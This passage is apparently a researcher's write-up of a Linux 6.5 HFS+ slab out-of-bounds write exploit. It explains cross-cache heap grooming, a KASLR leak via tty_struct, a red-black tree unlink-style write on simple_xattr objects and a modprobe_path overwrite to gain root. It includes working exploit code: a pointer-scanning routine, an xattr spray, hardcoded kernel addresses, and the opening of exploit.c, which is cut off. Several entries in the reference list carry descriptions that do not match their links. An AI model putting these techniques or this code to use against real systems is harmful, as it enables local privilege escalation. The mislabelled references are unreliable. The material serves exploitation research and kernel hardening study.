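At this point it would make sense to look for more options that are guaranteed to stay within plain kmalloc-1k.

Still, given all the hardening already present in Ubuntu 24.04, which ships the hardened 6.8 kernel, it makes a lot of sense to face the inevitable: from now on, modern slab UAF and OOB exploits will probably have to rely on cross-cache attacks. And if those get blocked as well, there will probably be some even more convoluted attacks. (Don't get me wrong, this is good news for security, but here we are taking the offensive security approach and the hacker mindset.)

We think the attentive reader knows where this is going: as an exercise, we will "simply" go cross-cache into kmalloc-cg-1k and reuse all the nice properties of tty_struct for the KASLR leak and profit.

Cross-Cache What

Long story short, nobody likes cross-cache attacks because they are hard and they are notorious for being unreliable (although, funnily enough, if you follow the citations claiming this, you will not find any clear statistics).

Not many kernel developers know about these, perhaps only those with the time and resources to write kernel CTFs for fun. A recently published systematic study tried to come up with a general method for turning very weak memory corruption primitives into practical cross-cache attacks, but for kmalloc-1k we could not really reproduce their results, which is a pity.

On the other hand, Etenal wrote a classic article on CVE-2022-27666 that lays out the idea in a much more practical way. Note that he had no other choice but to go down this road: https://etenal.me/archives/1825.

In addition, there is willsroot's CTF challenge and analysis of a cool cross-cache trick which, although it does not transfer that well to real life, is very cool: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html. I am sure there are many more, but in fact Will said this in 2022: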

I found resources on this strategy quite scarce, and haven’t personally seen a CTF challenge that requires it.

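Well, that convinced me that it makes a lot of sense to dig deeper here for educational reasons.

As with everything in computer science, the idea is generally simple. The purpose of the slab/SLUB allocator in the kernel is to provide practically optimal allocation for objects smaller than a page. Small object allocations happen so frequently in the kernel that the allocator had to go through many rounds of optimization before arriving at the current SLUB architecture, and it turns out that optimizing page allocation performance is just as important for memory allocation.

As it turns out, that problem had already been solved by the time Linux became really popular.

The idea was originally invented by Harry Markowitz in the 60s and popularized in Donald Knuth's The Art of Computer Programming, which is cited in the kernel documentation. Like other material from those books, page allocation was, until recently, not a particularly attractive topic of discussion among kernel hackers.

So, to understand the concept better, I tried writing a simple simulator. The general idea is that, since this is not a use-after-free:

We just need to allocate a bunch of objects, and at some point the kmem_cache will allocate a slab from the page allocator (which turns out to be an order-1 page block, meaning it is 2*pagesize)
The same goes for both kmalloc-1k and kmalloc-cg-1k.
The conclusion is that as long as I can trigger object allocations in these two slab caches at roughly the same time, I may have a chance.

How?

After a series of simulation runs, I believe that whenever an order-2 or order-3 page block gets split, there is a healthy time window for kernel space code to obtain two adjacent page allocations, adjacent in the spatial sense.

I realized that at this point this was getting entirely speculative, so I wrote some Python code to see for myself.

In the resulting plot, every vertical red dashed line marks a situation where two allocations happened to produce a state that is ideal for page-level heap feng shui: we can lay down our vulnerable slab, have the target slab grab an order-1 page block from the page allocator, and then overflow into that memory region.

Etenal (who, by the way, seems to be an excellent photographer in addition to being an elite kernel hacker) writes: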

To mitigate this noise, I did something shown below:

1. drain the freelist of order 0, 1, 2.
2. allocate tons of order-2 objects(assume it’s N), by doing so, order 2 will borrow pages from order 3.
3. free every half of objects from step 2, hold the other half. This creates N/2 more object back to order-2’s freelist.
4. free all objects from step 1

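This works very well on an idle QEMU system. Does it work in production? That depends on the memory allocation noise, but in practice it works very well for an OOB read. The state of the buddy allocator free lists is actually exposed per order through procfs, in /proc/buddyinfo.

One thing is certain: since our target is kmalloc-1k, which allocates slabs of 8k bytes corresponding to order-1 page allocations, it makes a lot of sense to trigger our OOB write on top of an order-2 heap spray.

Why? Because, thanks to Donald Knuth, one thing is beyond doubt: right at the moment when an order-2 allocation has just been split into buddies in the buddy allocator, we have a very good chance of getting two contiguous allocations for the memory regions backing our isolated kmem_cache slabs.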
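The splitting argument can be illustrated with a toy buddy allocator. This is a deliberately minimal sketch and not the simulator used for the experiments: it ignores migrate types, per-CPU page lists and freeing, and the class and method names are made up for the example.

```python
class BuddyAllocator:
    """Toy buddy allocator that tracks free blocks by starting page frame number."""

    def __init__(self, max_order: int, total_pages: int):
        self.max_order = max_order
        self.free = {order: [] for order in range(max_order + 1)}
        # Start with everything free as max-order blocks.
        self.free[max_order] = list(range(0, total_pages, 1 << max_order))

    def allocate(self, order: int) -> int:
        if order > self.max_order:
            raise MemoryError("out of memory")
        if self.free[order]:
            return self.free[order].pop(0)
        # Free list drained: split a block of the next order, hand out the
        # lower half and put the upper half (its buddy) on this order's list.
        pfn = self.allocate(order + 1)
        self.free[order].append(pfn + (1 << order))
        return pfn


# With the order-0 and order-1 free lists empty, two back-to-back order-1
# requests are both served from the same freshly split order-2 block.
buddy = BuddyAllocator(max_order=2, total_pages=8)
first = buddy.allocate(1)   # think: new kmalloc-1k slab
second = buddy.allocate(1)  # think: new kmalloc-cg-1k slab
print(first, second)
```

In this model the second block starts exactly two pages after the first, which is the adjacency the cross-cache overflow relies on; on a real system, allocation noise between the two requests decides whether that still holds.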

Going back to our simulator and implementing the draining looks like this:

def simulate_time_evolution(self):
    """Simulate kernel noise generation over a series of time steps."""
    for time_step in range(TIME_STEPS):
        self.generate_noise()
        # Simulate freelist draining for cross-cache heap fengshui
        if time_step == 80:
            print("Draining freelists")
            buddyinfo = self.buddy_allocator.get_free_list_state()
            for _ in range(buddyinfo[0]):
                self.buddy_allocator.allocate(0)
            for _ in range(buddyinfo[1]):
                self.buddy_allocator.allocate(1)
            for _ in range(1):
                self.buddy_allocator.allocate(2)

        # Record the current state of the buddy allocator's free lists
        self.free_list_history.append(self.buddy_allocator.get_free_list_state())
        # Check for consecutive order-1 block allocations
        self.check_consecutive_allocations(time_step)

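This does indeed produce a few ideal spots for a cross-cache OOB in every run.

To test the concept further, we wrote a small kernel module that exposes a procfs node as a kind of timing side channel and lets user space check whether these two contiguous slab allocations actually happened. The result?

Guess what, Etenal said: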

Once it borrows pages from a higher order, two consecutively allocations will split the higher-order pages, and most importantly, the higher-order pages are a chunk of contiguous memory.

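He was not wrong. As it turns out, we were able to verify experimentally on a real kernel that the 0.2 seconds after an order-2 page block is split is the best time window for a cross-cache attack that tries to place the slabs of two separate kmem_caches (kmalloc-1k and kmalloc-cg-1k) next to each other in memory, so that our cross-cache OOB becomes feasible.

The nice part is that Mr. Knuth's algorithm is optimized for performance, which makes a lot of sense, but in practice it is harmful to the system: just by collecting some statistics on my own build, instrumented with the timing side-channel facility, we can stay within 0.1 seconds of the expected time window on a production kernel.

Slabby Memory Forensics

Although the following idea is simple, I have never seen it in an exploit or a CTF solution. Since we still cannot be entirely sure about the cross-cache timing, we will rely on our ability to read up to 65k. Given that we are trying to go cross-cache from a kmalloc-1k slab to a kmalloc-cg-1k slab, this means we have 8 full slabs we may miss by and still be able to read the sprayed tty_structs out of kernel memory.

Do we know the exact offset? No, we do not, but we do not actually need to.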

/* Function to search for pointer triples and calculate KASLR base */
void find_pointer_triples(uint8_t * buffer, int buffer_size, int * success, uint64_t * kaslr_base_out){
  for (int i = 0; i < buffer_size - 8; i++) {
    /* Extract the first pointer */
    uint64_t first_ptr = extract_pointer(buffer, i);

    if (!is_valid_pointer(first_ptr))
      /* Skip invalid pointers */
      continue;

    /* Extract the second pointer at the offset */
    int second_ptr_pos = i + OFFSET_2ND_PTR;

    if (second_ptr_pos + 8 > buffer_size)
      continue;

    uint64_t second_ptr = extract_pointer(buffer, second_ptr_pos);

    if (!is_valid_pointer(second_ptr))
      continue;

    /* Extract the third pointer at the next offset */
    int third_ptr_pos = second_ptr_pos + OFFSET_3RD_PTR - OFFSET_2ND_PTR;

    if (third_ptr_pos + 8 > buffer_size)
      continue;

    uint64_t third_ptr = extract_pointer(buffer, third_ptr_pos);

    if (!is_valid_pointer(third_ptr))
      continue;

    /* Calculate the differences */
    int64_t diff_first = first_ptr - BASE_ADDR_FIRST;
    int64_t diff_second = second_ptr - BASE_ADDR_SECOND;
    int64_t diff_third = third_ptr - BASE_ADDR_THIRD;

    printf("\n[+] Pointer triple found at byte offset %x:\n", i);
    printf("\tFirst pointer: 0x%lx (Difference: 0x%lx)\n", first_ptr, diff_first);
    printf("\tSecond pointer: 0x%lx (Difference: 0x%lx)\n", second_ptr, diff_second);
    printf("\tThird pointer: 0x%lx (Difference: 0x%lx)\n", third_ptr, diff_third);

    /* If all three differences match, calculate the KASLR base */
    if (diff_first == diff_second && diff_first == diff_third) {
      uint64_t kaslr_base = diff_first + KERNEL_BASE;

      printf("\n[+] KASLR base: 0x%lx\n", kaslr_base);
      * success = 1;
      * kaslr_base_out = kaslr_base;

      /* Stop once we find the KASLR base */
      return;
    }
  }
}

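Simple as it looks, the purpose of this code is just to search the kernel leak dump for values that look like kernel pointers. Given the structure of tty_struct, working out the KASLR base with basic arithmetic becomes straightforward. At this point, all that is left is to build some kind of more powerful write primitive and go after modprobe_path, since we now know where we are in memory.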
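The same heuristic fits in a few lines of Python, which is handy for testing it against a saved dump offline. Everything numeric here is a placeholder: the unslid addresses and field offsets are hypothetical and would have to be taken from the target kernel build, and the sanity checks assume the usual x86-64 behaviour of a 2 MiB-aligned slide within 1 GiB.

```python
import struct

KERNEL_BASE = 0xFFFFFFFF81000000  # assumption: default x86-64 text base without KASLR
# Hypothetical values; the real ones depend on the kernel build and tty_struct layout.
UNSLID = (0xFFFFFFFF82200000, 0xFFFFFFFF82300000, 0xFFFFFFFF82400000)
OFFSETS = (0x00, 0x18, 0x40)


def find_kaslr_base(leak: bytes):
    """Scan a leak for three pointers that all agree on the same KASLR slide."""
    for i in range(0, len(leak) - OFFSETS[-1] - 7):
        ptrs = [struct.unpack_from("<Q", leak, i + off)[0] for off in OFFSETS]
        slides = {p - u for p, u in zip(ptrs, UNSLID)}
        if len(slides) != 1:
            continue
        slide = slides.pop()
        # Assumption: the slide is 2 MiB aligned and smaller than 1 GiB.
        if 0 <= slide < (1 << 30) and slide % 0x200000 == 0:
            return KERNEL_BASE + slide
    return None


# Synthetic leak: plant a consistent triple at an arbitrary byte offset.
slide = 0x1A000000
leak = bytearray(0x400)
for off, unslid in zip(OFFSETS, UNSLID):
    struct.pack_into("<Q", leak, 0x123 + off, unslid + slide)
print(hex(find_kaslr_base(bytes(leak))))
```

Requiring three pointers to agree on one slide is what keeps the scan robust against stray values in the 65k dump, at the cost of being tied to one specific kernel build.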

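It is very simple, but it was actually inspired by an old script written by my longtime hero Imre Rad (of GCP hacking fame) back when he worked in a penetration testing lab. His Perl script was able to take a physical memory dump obtained from an embedded Linux device over JTAG, look up kernel data structures, and recover the full process tree from task_structs and related data using a similar offset-based heuristic, and it proved very useful on various occasions.

Arbitrary Write via Red-Black Trees

At this point we have all the basic ingredients to start exploiting the bug.

We have a base address. In addition, we are pretty comfortable overwriting whatever we want from kmalloc-1k into kmalloc-cg-1k, with something like a 7/8 probability on the first attempt.

Given all the trouble we went through with kmalloc-cg-1k, it would be really nice to do a simple in-cache overflow for RIP control this time. As discussed earlier, objects that can be sprayed into arbitrary kmem_caches have run out, but on 6.5 we can still allocate simple_xattrs: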

/**
 * simple_xattr_alloc - allocate new xattr object
 * @value: value of the xattr object
 * @size: size of @value
 *
 * Allocate a new xattr object and initialize respective members. The caller is
 * responsible for handling the name of the xattr.
 *
 * Return: On success a new xattr object is returned. On failure NULL is
 * returned.
 */
struct simple_xattr *simple_xattr_alloc(const void *value, size_t size)
{
    struct simple_xattr *new_xattr;
    size_t len;

    /* wrap around? */
    len = sizeof(*new_xattr) + size;
    if (len < sizeof(*new_xattr))
        return NULL;

    new_xattr = kvmalloc(len, GFP_KERNEL);
    if (!new_xattr)
        return NULL;

    new_xattr->size = size;
    memcpy(new_xattr->value, value, size);
    return new_xattr;
}

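Does this code make sense from an accounting (cgroups) point of view? An unprivileged user can allocate a bunch of attributes at will on an in-memory file system and have them charged to GFP_KERNEL. No, it does not make sense, which is why it was changed to GFP_KERNEL_ACCOUNT in newer kernel versions.

On Linux 6.5, however, we can still easily corrupt these objects in kmalloc-1k with our primitive. How easily? Well, starlabs and a few others have shown that tmpfs inodes store extended attributes in struct simple_xattr, and overwriting one of them used to be all it took to perform an unlink attack, since these were part of a per-inode linked list without any hardening.

This changed in 6.2 with the following commit: https://github.com/torvalds/linux/commit/3b4c7bc01727e3a465759236eeac03d0dd686da3.

Given: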

static inline void
__rb_change_child(struct rb_node *old, struct rb_node *new,
          struct rb_node *parent, struct rb_root *root)
{
    if (parent) {
        if (parent->rb_left == old)
            WRITE_ONCE(parent->rb_left, new);
        else
            WRITE_ONCE(parent->rb_right, new);
    } else
        WRITE_ONCE(root->rb_node, new);
}

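and the calling context, it is tempting to think of a red-black tree unlink attack analogous to the linked list unlink attack. In fact, we can always make sure to achieve some kind of memory corruption using a bunch of attacker-controlled nodes and extended attributes.

The best thing to do, however, is to realize that on kmalloc-1k, spraying 16 objects is enough to saturate at least one kmem_cache slab. Given how the red-black tree is laid out in memory, the simple little idea that I really pioneer in this article is the following.

Work out how many simple_xattrs objects need to be sprayed and into which kmalloc cache (for example, in kmalloc-1k a single slab holds 8 objects)
Make sure you can comfortably overwrite the simple_xattrs with your OOB or UAF primitive

Suppose someone allocates 16 simple_xattrs from user space; 8 of them will end up in some unused slab and the other 8 in our CPU's active slab. So far this is acceptable behavior, but if we manage to allocate some vulnerable object in that kmem_cache, we can overwrite one of the last 8 objects allocated in kmalloc-1k. Normally this means that in a red-black tree of 15 nodes, the corruption is forced onto one random node.

Well, we do not know which one, so if we are not careful and corrupt the tree in all sorts of nasty ways, we risk crashing the kernel outright after a few attempts.

Now, I am sure my favorite mathematician Paul Erdős would have loved to spend time on the general problem of what interesting things happen if you are given a random red-black tree and a randomly chosen node in it, and start asking algorithmic questions about the resulting structure.

Since we are complete dummies compared to that guy, what we do instead is allocate a bunch of nodes in order, so that our last 8 allocations are exactly the interesting ones our write primitive can overwrite, and we allocate them in such a way that they happen to be the 8 red leaf nodes at the bottom of the red-black tree. How? Well, some basic Python will tell you this is doable; in the exploit, the spray looks like this: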

void spray_xattr(void)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int base_nodes[] = {7, 3, 11, 1, 5, 9, 13};
    int leaf_nodes[] = {0, 2, 4, 6, 8, 10, 12, 14};
    int base_size = sizeof(base_nodes) / sizeof(base_nodes[0]);
    int leaf_size = sizeof(leaf_nodes) / sizeof(leaf_nodes[0]);

    for (int i = 100; i < 111; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", i, i);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", i);
        setxattr("/tmp/tmpfs/xattr_node_3", xattr_name, xattr_value, strlen(xattr_value), 0);
    }


    for (int i = 0; i < base_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", base_nodes[i], base_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", base_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < leaf_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", leaf_nodes[i], leaf_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", leaf_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

}
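The claim that this insertion order leaves the last eight allocations as red leaves is easy to check with a textbook red-black tree. The sketch below is a generic insert-with-fixup implementation and not the kernel's lib/rbtree.c; it assumes the xattr names compare like the integers they encode, which the zero-padded "security.%02d" format is meant to guarantee.

```python
RED, BLACK = "R", "B"


class Node:
    def __init__(self, key):
        self.key, self.color = key, RED
        self.left = self.right = self.parent = None


class RBTree:
    def __init__(self):
        self.root = None

    def _rotate(self, x, left):
        # left=True rotates left at x (x.right moves up); left=False is the mirror.
        y = x.right if left else x.left
        inner = y.left if left else y.right
        if left:
            x.right, y.left = inner, x
        else:
            x.left, y.right = inner, x
        if inner:
            inner.parent = x
        y.parent = x.parent
        if x.parent is None:
            self.root = y
        elif x.parent.left is x:
            x.parent.left = y
        else:
            x.parent.right = y
        x.parent = y

    def insert(self, key):
        parent, cur = None, self.root
        while cur:
            parent, cur = cur, (cur.left if key < cur.key else cur.right)
        node = Node(key)
        node.parent = parent
        if parent is None:
            self.root = node
        elif key < parent.key:
            parent.left = node
        else:
            parent.right = node
        self._fixup(node)

    def _fixup(self, n):
        while n.parent and n.parent.color == RED:
            p, g = n.parent, n.parent.parent
            p_is_left = g.left is p
            uncle = g.right if p_is_left else g.left
            if uncle and uncle.color == RED:      # recolor and continue upwards
                p.color = uncle.color = BLACK
                g.color = RED
                n = g
                continue
            if (p.right is n) == p_is_left:       # inner grandchild: rotate to outer
                self._rotate(p, left=p_is_left)
                n, p = p, n
            p.color, g.color = BLACK, RED
            self._rotate(g, left=not p_is_left)
        self.root.color = BLACK


def red_leaves(tree):
    """Sorted keys of all childless red nodes."""
    out, stack = [], [tree.root]
    while stack:
        n = stack.pop()
        if n is None:
            continue
        if n.left is None and n.right is None and n.color == RED:
            out.append(n.key)
        stack += [n.left, n.right]
    return sorted(out)


tree = RBTree()
for key in [7, 3, 11, 1, 5, 9, 13] + [0, 2, 4, 6, 8, 10, 12, 14]:
    tree.insert(key)
print(red_leaves(tree))
```

With this order no rotation is ever triggered: the seven base nodes form a perfectly balanced skeleton, and each of the eight later insertions simply hangs a red leaf under a black parent.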

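My knowledge of data structures was pretty rusty when I started looking into this, so if you are wondering why it works, here is the gist.

Red-Black Tree Properties Recap

1. Every node is either red or black.
2. The root is always black.
3. A red node cannot have red children (that is, there are no two consecutive red nodes on any path).
4. Every path from a node to its descendant null nodes must contain the same number of black nodes, known as the black height.

Now let's analyze what happens when a red leaf is removed:

Removing the leaf does not affect the black height:

A red leaf has no children, and removing it does not affect the number of black nodes on any path to the null nodes. The black height of all paths therefore stays the same, preserving that invariant.

No red node with a red parent:

By property 3, a red node cannot have a red parent, so removing a red leaf does not violate the rule about consecutive red nodes. The parent of the red leaf (if it exists) is black; otherwise the red leaf itself would be a root with no parent, which cannot happen here.

The insertion order looks somewhat random, but in fact there are multiple choices. After writing some more Python code, we used a simple Tk canvas to visualize what happens inside the data structure in the kernel as these extended attributes get allocated.

This way we avoid all the sketchy tree rotations during the erase calls, since those rotations would certainly mess up our pointers and lead to unhandled page faults and kernel crashes. Operations like this one are problematic (/lib/rbtree.c#L227):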

static __always_inline void
____rb_erase_color(struct rb_node *parent, struct rb_root *root,
    void (*augment_rotate)(struct rb_node *old, struct rb_node *new))
{
    struct rb_node *node = NULL, *sibling, *tmp1, *tmp2;

while (true) {
    /*
     * Loop invariants:
     * - node is black (or NULL on first iteration)
     * - node is not the root (parent is not NULL)
     * - All leaf paths going through parent and node have a
     * black node count that is 1 lower than other leaf paths.
     */
    sibling = parent->rb_right;
    if (node != sibling) { /* node == parent->rb_left */
        if (rb_is_red(sibling)) {
            /*
             * Case 1 - left rotate at parent
             *
             *     P               S
             *    / \             / \
             *   N   s    -->    p   Sr
             *      / \         / \
             *     Sl  Sr      N   Sl
             */
            tmp1 = sibling->rb_left;
            WRITE_ONCE(parent->rb_right, tmp1);
            WRITE_ONCE(sibling->rb_left, parent);
            rb_set_parent_color(tmp1, parent, RB_BLACK);
            __rb_rotate_set_parents(parent, sibling, root,
                        RB_RED);
            augment_rotate(parent, sibling);
            sibling = tmp1;
        }

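Once this is done, we have an almost arbitrary write.

Escalation

As we saw above, similarly to the unlink attack, we have something like *ptr1->field = ptr2 and *ptr2->field2 = ptr1.

As the starlabs article points out: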

Unfortunately, `next` is written to `prev` in line 2. This means that `prev` must be a valid pointer as well. This poses a significant restriction on the values that we can write to `next`. However, we can take advantage of the physmap to provide valid `prev` values.

The physmap is a region of kernel virtual memory where physical memory pages are mapped contiguously. For example, if a machine has 4GiB (2^32 bytes) of memory, 32 bits (4 bytes) are required to address each byte of physical memory available in the system. Assuming the physmap starts at 0xffffffff00000000, any address from 0xffffffff00000000 to 0xffffffffffffffff will be valid as every value (from 0x00000000-0xffffffff) of the lower 4 bytes are required to address memory.

In our case, we are working with the following code from include/linux/rbtree_augmented.h:

static __always_inline struct rb_node *
__rb_erase_augmented(struct rb_node *node, struct rb_root *root,
             const struct rb_augment_callbacks *augment)
{
    struct rb_node *child = node->rb_right;
    struct rb_node *tmp = node->rb_left;
    struct rb_node *parent, *rebalance;
    unsigned long pc;

    if (!tmp) {
        /*
         * Case 1: node to erase has no more than 1 child (easy!)
         *
         * Note that if there is one child it must be red due to 5)
         * and node must be black due to 4). We adjust colors locally
         * so as to bypass __rb_erase_color() later on.
         */
        pc = node->__rb_parent_color;
        parent = __rb_parent(pc);
        __rb_change_child(node, child, parent, root);
        if (child) {
            child->__rb_parent_color = pc;
            rebalance = NULL;
        } else
            rebalance = __rb_is_black(pc) ? parent : NULL;
        tmp = parent;
    } else if (!child) {
        /* Still case 1, but this time the child is node->rb_left */
        tmp->__rb_parent_color = pc = node->__rb_parent_color;
        parent = __rb_parent(pc);
        __rb_change_child(node, tmp, parent, root);
        rebalance = NULL;
        tmp = parent;

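In __rb_change_child we overwrite the parent's child pointer with the child pointer, as described above. However, if the child pointer is not NULL, we also have to deal with child->__rb_parent_color = pc;. That is, we want to apply the physmap trick: place the child pointer in the valid range (0xffff888...) and introduce ASCII characters only in the low bytes of the address. But there is a catch. When I first tried this in gdb, all of my writes appeared to be 4- or 8-byte aligned.

Like most security researchers, I am used to staring at assembly or decompiled Ghidra listings all day, yet I have a hard time reading C code that is written with fancy keywords and compiler directives, so at first I suspected this was the culprit: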

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));
    /* The alignment might seem pointless, but allegedly CRIS needs it */

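Even though I had exploited bugs with ROP chains before, this was scary, because I really wanted the modprobe attack to work, and 8-byte alignment might have prevented me from reusing the idea. Why? The reason is mundane: the original value of the variable is /sbin/modprobe, and we only control 4 bytes of the address in the payload. If all we can write is some garbage, how do we turn this path into something attacker-controlled? Starlabs's solution was to keep the leading slash of /sbin and position the write off by one from it (for example, writing tmp/ after the slash to obtain a path such as /tmp/folder). See where this is going? If we could only write at 8-byte boundaries, we would be in trouble. Fortunately, the aligned writes were not caused by __attribute__((aligned(sizeof(long)))) but by something simpler, namely this __rb_parent macro: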

#define __rb_parent(pc)    ((struct rb_node *)(pc & ~3))

#define __rb_color(pc)     ((pc) & 1)
#define __rb_is_black(pc)  __rb_color(pc)
#define __rb_is_red(pc)    (!__rb_color(pc))

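The __rb_parent macro is invoked in the snippet above. The idea is that the low bits of the parent pointer store the node's color, and the remaining bits are used as the actual pointer. Fortunately, this only forces 32-bit (4-byte) alignment. So we can carry out the attack in two steps: first overwrite the beginning of the path with /tmp, then move the pointer 4 bytes further and write /bgp or whatever else we like. With that, the exploit is complete. Once modprobe is redirected to a file we control, exploitation becomes trivial.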
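The alignment behaviour can be reproduced in user space. The following is a minimal sketch, not kernel code: parent_from_pc and survives_mask are hypothetical helpers that mirror the masking done by __rb_parent, and the sample addresses in the note after the block are the MODPROBE_ADDR_ONE and MODPROBE_ADDR_TWO constants from the exploit source below.

```c
#include <assert.h>
#include <stdint.h>

/* Same masking as __rb_parent(pc): clear the two low bits of the word. */
static uint64_t parent_from_pc(uint64_t pc)
{
    uint64_t parent = pc & ~(uint64_t)3;

    /* Postcondition: the recovered pointer is always 4-byte aligned. */
    assert((parent & 3) == 0);
    return parent;
}

/* An address passes through the mask unchanged only if it is 4-byte aligned. */
static int survives_mask(uint64_t addr)
{
    return parent_from_pc(addr) == addr;
}
```

Both 0xffffffff82b3f638 and 0xffffffff82b3f63c pass through unchanged, while 0xffffffff82b3f639 is rounded down to 0xffffffff82b3f638. Targets 4 bytes apart are therefore reachable, but byte-granular offsets are not.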

Q.E.D.

References

Mac OS X overview – https://en.wikipedia.org/wiki/Mac_OS_X

Introduction to Apple File System – https://en.wikipedia.org/wiki/Apple_File_System

macOS High Sierra information – https://en.wikipedia.org/wiki/MacOS_High_Sierra

Apple's HFS Plus file system documentation – https://developer.apple.com/library/archive/technotes/tn/tn1150.html

Study of HFS Plus structures – https://dl.acm.org/doi/pdf/10.1145/3391202

LWN article investigating kernel vulnerabilities – https://lwn.net/Articles/652468/

Follow-up on kernel vulnerability records – https://lwn.net/Articles/652472/

Linux kernel commit: introduction of kmalloc-cg-* – https://github.com/torvalds/linux/commit/494c1dfe855ec1f70f89552fce5eadf4a1717552

Definition of GFP_KERNEL_ACCOUNT in Linux – https://elixir.bootlin.com/linux/v6.5/C/ident/GFP_KERNEL_ACCOUNT

Exploring Linux's random kmalloc caches – https://sam4k.com/exploring-linux-random-kmalloc-caches/#introducing-random-kmalloc-caches

Linux commit attempting to kill caches – https://github.com/torvalds/linux/commit/734bbc1c97ea7e46e0e53b087de16c87c03bd65f

Linux Security Summit talk on kernel vulnerabilities – https://www.youtube.com/watch?v=2hYzxsWeNcE&ab_channel=TheLinuxFoundation

KASLR (kernel address space layout randomization) – https://lwn.net/Articles/569635/

Privilege escalation via execve calls – https://sam4k.com/like-techniques-modprobe_path/

Linux source: fs/hfsplus/hfsplus_raw.h – https://github.com/torvalds/linux/blob/master/fs/hfsplus/hfsplus_raw.h

Linux manual page for the setxattr system call – https://man7.org/linux/man-pages/man2/setxattr.2.html

Article on known HFS Plus issues – https://etenal.me/archives/1825

Research on slab allocator resilience – https://dl.acm.org/doi/10.1145/3372297.3423353

pahole, a tool for inspecting structure padding – https://linux.die.net/man/1/pahole

Chuck Norris joke API – https://api.chucknorris.io/jokes/etd9c1v9smqxo2xonfm2lq

Kernel exploitation: tty_struct documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#tty_struct

Kernel exploitation: tty_file_private documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#tty_file_private

Kernel exploitation: poll_list, pollfd documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#poll_list

Kernel exploitation: user_key_payload documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload

Kernel exploitation: setxattr documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#_setxattr

Kernel exploitation: seq_operations documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#seq_operations

Kernel exploitation: subprocess_info documentation – https://github.com/smallkirby/kernelpwn/blob/master/structs.md#subprocess_info

Discussion on killing kernel objects – https://lwn.net/Articles/944647/

SLUB allocator security paper – https://www.usenix.org/system/files/usenixsecurity24-maar-slubstick.pdf

Understanding the Linux kernel memory allocator – https://www.kernel.org/doc/gorman/html/understand/understand009.html

Photographer's personal website – https://creation.etenal.me/

Winners of the 2021 GCP VRP Prize – https://security.googleblog.com/2022/06/announcing-winners-of-2021-gcp-vrp-prize.html

Biography of the mathematician Paul Erdős – https://hu.wikipedia.org/wiki/Erd%C5%91s_P%C3%A1l

starlabs: exploiting an io_uring vulnerability – https://starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/

Exploit:

/*
 * exploit.c
 *
 * Attila Szasz <[email protected]>
 * @4ttil4sz1a
 *
 * Exploit for hfs+ slab out of bounds write
 * targeting Linux kernel 6.5
 *
 */

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include <stdint.h>
#include <unistd.h>
#include <sched.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/shm.h>
#include <linux/keyctl.h>
#include <stdbool.h>
#include <time.h>
#include <zlib.h>
#include <endian.h>
#include <linux/types.h>
#include <errno.h>
#include <sys/mount.h>
#include <pwd.h>
#include <grp.h>
#include <semaphore.h>


#define KEY_DESC_MAX_SIZE 900
#define XATTR_NAME_MAX_SIZE 1024
#define MODPROBE_PATH "/proc/sys/kernel/modprobe"
#define BUFFER_SIZE 256

/*
#define DEBUG_CROSSCACHE 1
*/

/* see security/keys/key.c */
#define SPRAY_KEY_SIZE 13
#define SPRAY_KEY_SIZE_INIT 6
#define SPRAY_TTY_INITIAL 6
#define SPRAY_TTY_SIZE 9
#define SPRAY_XATTR_SIZE_MODPROBE 15

#define do_error_exit(msg) do {perror("[-] " msg); exit(EXIT_FAILURE); } while (0)

#define KERNEL_BASE_LOWER 0xffffffff80000000
#define KERNEL_BASE_UPPER 0xffffffffc0000000

#define OFFSET_2ND_PTR 0x230
#define OFFSET_3RD_PTR (OFFSET_2ND_PTR + (0x60))

#define BASE_ADDR_FIRST 0xffffffff82284be0
#define BASE_ADDR_SECOND 0xffffffff81631bc0
#define BASE_ADDR_THIRD 0xffffffff81633e30

#define MODPROBE_ADDR_ONE 0xffffffff82b3f638
#define MODPROBE_ADDR_TWO 0xffffffff82b3f63c

#define KERNEL_BASE 0xffffffff81000000

#define PIPE_SPRAY_NUM 20

#define PGV_1PAGE_SPRAY_NUM 0x100

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x100

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x100

int pgv_1page_start_idx;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

uint64_t kaslr_base_recovered;

#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

/* Each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

/* Operations type */
enum {
    CMD_ALLOC_PAGE,
